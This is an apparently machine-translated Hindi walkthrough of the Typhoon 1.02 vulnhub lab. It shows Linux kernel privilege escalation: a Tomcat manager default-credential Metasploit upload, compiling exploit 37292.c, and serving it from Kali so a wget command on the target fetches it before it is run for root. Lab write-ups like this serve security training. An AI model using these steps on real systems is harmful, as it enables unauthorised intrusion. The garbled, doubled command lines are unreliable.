लिनक्स में एस्केलेटिंग विशेषाधिकार कठिन हो सकते हैं, जबकि भेद्यता खोज के लिए स्वचालित उपकरण हैं, ऐसी तकनीकें हैं जिनका उपयोग हम गेम जीतने के लिए कर सकते हैं।
कर्नेल कारनामों का उपयोग करते हुए लिनक्स विशेषाधिकार वृद्धि उन मौलिक नैतिक हैकिंग तकनीकों में से एक है।
मैं आपको दिखाता हूं कि टायफून 1.02 वल्ननबॉक वॉकथ्रू का उपयोग कैसे करें जो इस तकनीक को कवर करने के लिए सभी सामग्री को आसानी से रखता है!
Contents
जिसकी आपको जरूरत है
- टाइफून 1.02 वल्लनब मशीन – वर्चुअलबॉक्स
- काली लिनक्स वर्चुअल मशीन – वर्चुअलबॉक्स
कर्नेल संस्करण प्राप्त करें
एक कमांड जो मैं उपयोग करता हूं वह है lsb_release -a कमांड को सही लिनक्स कर्नेल संस्करण प्राप्त करने के लिए ताकि मैं सही शोषण का अनुसंधान कर सकूं।

Metasploit का उपयोग करके कर्नेल विज़न प्राप्त करें
कर्नेल संस्करण प्राप्त करने का एक और तरीका मेटास्प्लोइट का उपयोग करना है।
इस मामले में मैंने पाया है कि डिफ़ॉल्ट रूप से कॉन्फ़िगर किए गए क्रेडेंशियल्स के साथ एक टॉमकैट प्रबंधक सेवा चल रही है।
परिणामस्वरूप मैंने Metasploit शोषण मल्टी / http / tomcat_mgr_upload का उपयोग किया है जिसे क्रेडेंशियल्स की आवश्यकता है। लेकिन शोषण एक धमाकेदार सत्र देता है!

एक बार जब मेरे पास वह मीटरप्रेटर सत्र होता है तो मैं लिनक्स कर्नेल संस्करण प्राप्त करने के लिए sysinfo कमांड का उपयोग कर सकता हूं।
शोषण संकलन
शोषण का संकलन करने में कठिनाइयाँ हो सकती हैं मेरा विश्वास करो, लेकिन यहाँ सौभाग्य से ऐसा नहीं है।
gcc 37292.c -o rootme.exe
जीसीसी 37292.c –ओ rootme।प्रोग्राम फ़ाइल |
लक्ष्य के लिए शोषण प्राप्त करें
मैंने शोषण को संकलित किया, लेकिन अब मैं इसे निष्पादन के लिए दूरस्थ लक्ष्य पर कैसे पहुंचाऊं ताकि मैं अपने निम्न स्तर के विशेषाधिकारों को जड़ तक बढ़ा सकूं?
पायथन-एम सिंपलएचटीपीएसवर 8000
अजगर –म SimpleHTTPServer 8000 |
फिर शेल पर लक्ष्य पर मैंने नीचे दिए कमांड को चलाया:
wget http: // kali-ip: 8000 / rootme.exe
wget एचटीटीपी://kali-ip:8000/rootme.exe |
एक्सप्लॉइट गेट रूट को चलाएं
पहले मैं शोषण की फ़ाइल अनुमतियों को बदलने जा रहा हूं ताकि मैं इसे चला सकूं।

मैंने लिनक्स कर्नेल संस्करण के लिए संकलित कारनामे को सफलतापूर्वक चलाया है और ऐसा करने के लिए मैंने अपने विशेषाधिकारों को जड़ तक बढ़ा दिया है। मुझे झंडा मिल गया!